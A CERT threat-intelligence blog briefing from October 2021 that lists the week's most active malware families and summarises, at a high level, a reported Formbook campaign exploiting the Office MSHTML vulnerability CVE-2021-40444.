Briefing Malware
BLOG CERT SOGETI ESEC
CERT BRIEFING MALWARE

Briefing Malware - 05/10/2021

5th of October 2021 - Winners of the 40th week : Redline, NjRAT and Vidar.

Some links points at extended actionnable intelligence (Threat Bulletins, TTPs, signatures, etc) on our Threat Intelligence Platform Anomali. This access is limited to our clients.

 

Threat statistics report

Publication date:

05/10/2021

Distribution :

TLP : WHITE  

What's new?

Formbook(NC)

FormBook Adds Latest Office 365 0-Day Vulnerability (CVE-2021-40444) to Its Arsenal

#Trend Micro researchers unveil a new #Formbook campaign in which its developer weaponized such #infostealer with the recent #Office 365 MSHTML vulnerability (#CVE-2021-40444) instead of #CVE-2017-019. Both vulnerabilities allow a Remote Code Execution (#RCE) via crafted Office documents. Formbook is an information stealer that is active since 2016 but is constantly evolving such as the recent addition of #MacOS support (via the fork #Xloader) or the addition of #Cobalt strike beacons. Formbook is well-known for its use of vulnerabilities involving Office Documents. In this new campaign, the malware (#Formbook version 4.1) is delivered through a two-layer of #PowerShell scripts; the first one downloading the second one being hosted on #Discord. As previously reported, the malware is injected into a Calculator while the obfuscation was applied this time over a #.Net injector. As often the entry vector was a phishy email where a victim has downloaded and opened a maldoc attached followed by a successful exploitation of the vulnerability.

 

https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html

 

Download the report

 

 

Print Email